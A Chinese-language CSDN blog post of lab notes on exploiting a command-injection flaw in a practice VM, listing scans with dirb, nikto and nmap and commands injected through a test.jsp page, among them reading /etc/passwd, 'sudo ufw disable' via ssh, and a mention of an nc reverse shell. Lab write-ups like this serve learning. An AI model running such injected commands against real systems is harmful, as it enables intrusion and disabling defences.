6.21命令执行靶场

已于 2023-06-25 14:53:08 修改
阅读量110 收藏
点赞数
文章标签: php 开发语言
于 2023-06-24 09:53:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ailkli/article/details/131320404
版权
文章详细介绍了如何利用命令执行漏洞进行靶场渗透测试,包括扫描IP、端口,发现并访问靶机,使用dirb、nikto等工具扫描目录,尝试执行系统命令,如ls、uname等,以及在发现SSH服务后尝试登陆和利用反弹shell进行进一步攻击。
摘要由CSDN通过智能技术生成

 命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令

应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令,当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行漏洞

 靶场渗透过程:

(35条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客

靶场导入vm

扫描IP获得靶机地址带vm标识

扫描可能的IP的端口判断是不是靶机

有多个vm   进行地址栏访问地址判断哪个是靶机地址  判断出120是靶机地址

根据端口扫描进行地址访问

扫描目录:

dirb http://192.168.3.120:22
dirb http://192.168.3.120:5355
dirb http://192.168.3.120:8080

访问:

 http://192.168.3.120:8080/

http://192.168.3.120:8080/index.html

 192.168.3.120:8080/manager

 换工具进行扫描

nikto -host http://192.168.3.120:8080 

1.  192.168.3.120:8080/manager/html

2.  http://192.168.3.120:8080/test.jsp

 

根据页面提示输入

ls -l 

ls -l /tmp

ls -alh /home

uname -a

ssh bill@localhost sudo -l

 ssh bill@localhost sudo ufw disable

kali设置监听端口 

 http://192.168.3.120:8080/manager/status

ps:

asp .net  运行在iis中间件

php    运行在 apache  nginx

jsp    运行在java 

dirb nikto 御剑  dirsearch扫描目录

nikto -h 1892.168.3.120:8080

发现目录:

1.manager.html:没有权限

2.text.jsp:

发现有页面 输入框   

输入IP地址有没有反应

pwd可以执行

ls执行不了

whomi

ls -l /tmp出现信息文件   

ls -alh /tmp 发现隐藏文件  没有重要信息

ls -alh /  发现很多文件  但不重要

ls -alh /home  发现用户bill   和文件bill

cat /home/bill  命令执行不了

more /home/bill  命令执行不了

tac /home/bill  命令执行不了

cat -alh /etc/passwd  命令执行不了

ls -alh /etc/passwd  命令执行

cd /home/ 命令执行不了

说明只能执行ls -l上面可以执行的

3.看目录 :8080/manager/status  显示要求登陆   看页面源代码发现一个用户名和密码   但登不进去

nmap -sV 192.168.3.120 -p 1-65535 

发现有ssh  尝试用发现的用户和密码进行登陆  s3cret

使用漏洞扫描工具进行扫描

4.返回在8080:/text.jsp进行输入

ssh bill@localhost sudo -l

(35条消息) CTF-命令执行【超详细】_ctf 命令执行_不知名白帽的博客-CSDN博客

 使用反弹shell连接

在登录框用nc方式生成反弹shell

反弹shell原理和常见反弹shell方式 - 知乎 (zhihu.com)

 Linux下几种常见的反弹shell方式 - 简书 (jianshu.com)

 (36条消息) 【学习笔记】bash -i命令_ps_x的博客-CSDN博客

kali开启防火墙  service ufw status

suid权限

Linux SetUID(SUID)文件特殊权限用法详解 (biancheng.net)

ailkli
关注
jxbrowser-6.21
09-01
《JxBrowser 6.21:跨平台的嵌入式Web浏览器库》 JxBrowser是一款强大的Java库,专为开发者提供在Java应用程序中嵌入Web浏览器功能。标题"jxbrowser-6.21"表明我们关注的是该库的特定版本——6.21。这个版本包含了...
jxbrowser6.21
03-17
综合以上信息,JxBrowser 6.21 是一个强大的 Java 组件,用于在桌面应用程序中集成 Web 浏览器功能,其API接口提供了丰富的功能,如加载网页、执行 JavaScript、处理事件等,并且遵循特定的开源许可协议。...
pgAdmin后台命令执行漏洞(CVE-2023-5002)
蚁景网安学院
06-24 859
针对于漏洞 CVE-2022-4223,官方做了一定的修复措施。首先是添加了 @login_required​ 进行权限校验。在 Flask 框架中,@login_required​ 装饰器通常与 Flask-Login 扩展一起使用。Flask-Login 提供了简单而强大的用户身份验证功能,其中包括 @login_required​ 装饰器用于保护需要登录用户才能访问的视图。
6.21.5 upload靶场第5关和第6关
ailkli的博客
06-23 74
没有去空格的函数后缀php. .或者.php .放两次包第六关大小写转换123.PHP
6.21
qq_24260707的博客
06-24 124
日记 6.21
2402_85865867的博客
06-21 146
今天北京下雨,冒着雨踢足球⚽️太爽了!明天加油💪('ω'💪)
6.21 作业
m0_61549995的博客
06-23 302
2.TCP服务器select。3.TCP客户端select。
6.21作业
m0_68526641的博客
06-23 285
【代码】6.21作业。
艾瑞 6.21
qq_63771774的博客
06-21 180
1.Java的发展历史,现应用最广泛的版本是Java8.02.idea的开发环境和安装过程:JDK是java的开发工具包,包含编译器、解析器和源代码;JRE是java的运行环境,包含了源代码和JVM;JVM是java的虚拟机。NotePad++ 是一款非常好用的记事本, 比windows自带的记事本好用, 可以用它写笔记或者写代码都可以。在JDK的bin目录中, 存储了各种各样的命令, 其中最重要的两个是java和javac,javac 是编译命令, 被编译的目标对象必须是Java源代码文件,而java 是
6.21编程练习
mwhN_的博客
06-21 271
封装:将有关的数据和操作代码封装在一个对象中,形成一个基本单位,各个对象之间相互独立、互不干扰,且将对象中某些部分对外隐藏。7、友元函数可以调用所在类的任意方式的成员,嵌套类的不行,想要读取private的数据成员要再定义get函数!静态数据成员:可以直接用类名来引用,是为了解决数据共享问题,可以节省内存空间(避免数据冗余)8、C++性质:继承性(单/多继承、虚继承)、封装性(类)、多态性(虚函数): sizeof。6、定义静态成员函数主要目的:处理类的静态数据成员。2、tellg:获取读指针位置。
6.21长难句打卡
m0_62249858的博客
06-24 274
在上大学之前,学生们同样可以通过学习编程而获益,大学里计算机科学的入门课程都排得满满当当,这会赶走那些经验不足或意志不够坚定的学生。1.brim v.充满 n.边缘。
WinRAR v6.21简体中文64位
03-01
加压解压软件,简体中文版64位。文件为自解压,运行前请先卸载旧版并重启计算机。数字杀毒软件报毒请添加白条名单,如有顾虑请自行到官网下载。
VNC-Viewer-6.21.1109-Windows
10-09
通常,这样的压缩包会包含可执行文件、配置文件、帮助文档等,用于安装和配置VNC Viewer。 使用VNC Viewer时,用户需要知道目标设备的IP地址或主机名,以及VNC服务器的端口号(默认为5900)。连接建立后,VNC ...
Evernote_6.21.6.2195.exe
08-10
Evernote_6.21.6.2195.exe
推荐15个2024最新精选wordpress模板
最新发布
jianzhanyes的博客
11-16 946
英文wordpress模板,适合B2C网站搭建,功能强大且兼容性好,是许多专业外贸网站的首选。绿色的亚马尔Yamal外贸独立站wordpress模板,适用于外贸公司建独立站的wordpress主题。适合工业、制造业企业官网使用的wordpress模板,简洁实用、后台通过主题选项管理,操作便捷。国潮好物,配国产主题,为中国制造加油、助力,适合生产、加工、制造业官网的WordPress主题。制造业wordpress网站模板,适合生产制造企业官方网站使用的wordpress外贸主题。
RabbitMQ 与 PHP Swoole 实现
学习,分享一直在路上
11-12 1138
RabbitMQ 是一个开源的消息队列中间件,允许通过异步消息传递来解耦应用程序的各个部分。Swoole 是一个高性能的 PHP 扩展,支持异步编程和协程,适用于构建高并发的网络服务。将 RabbitMQ 与 Swoole 结合使用,可以构建高效、可扩展的应用程序。本文将介绍如何使用 RabbitMQ 和 PHP Swoole 实现一个简单的消息队列示例。使用 Docker 快速启动 RabbitMQ 实例
C语言入门到精通(第六版)——第十六章
qq_63485530的博客
11-14 1086
3、本地网络上的其他主机接收到ARP请求帧后,检查是否与自己的IP地址匹配,如果不匹配,则丢弃APR请求帧,如果主机B发现与自己的IP地址匹配,则将主机A的物理地址和IP地址添加到自己的ARP缓存中,然后主机B将自己的物理地址和IP地址发送给主机A,当主机A接收到主机B发来的信息后,将用这些信息更新ARP缓存。在发送数据时,应用层的数据传输到传输层,加上TCP的首部,数据就构成了报文。简单来说,套接字就是一个假想的连接装置,其作用类似于插座,插座用于连接电器和电线,套接字用于连接程序和网络,完成通信功能。
【故障解决】麒麟系统右下角网络图标取消显示叹号
鹏大圣运维
11-13 1163
Hello,大家好啊!今天给大家带来一篇关于如何在麒麟系统中解决网络图标出现感叹号问题的文章。在日常使用麒麟系统的过程中,我们在内网或公网环境下,有时会遇到网络图标上出现感叹号的情况。这通常是因为系统默认的 NetworkManager.conf 配置文件中指定了一个用于网络探测的 uri 地址,当系统无法访问这个地址时,就会认为网络不通,从而显示感叹号。即便在公网环境下,有时也会遇到这种问题。今天我们就来介绍几种解决方法,帮助大家轻松排除困扰!欢迎大家分享点赞,点个在看和关注吧!
C03S05-PLinux网络之自动装机
Lin_Nong的博客
11-15 978
PXE( Preboot execution Environment,预启动执行环境 )是一种允许计算机通过网络安装操作系统的技术。PXE也是C/S架构,允许客户端通过网络从服务端下载引导镜像,并加载安装文件或整个操作系统。
winrar 6.21 32 64
09-05
winrar 6.21是一种常用的压缩文件工具,可以用于处理各种类型的文件。它支持32位和64位操作系统,这意味着它可以在不同的计算机上运行,无论是旧的32位操作系统还是现代的64位操作系统。 Winrar 6.21提供了很多有用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值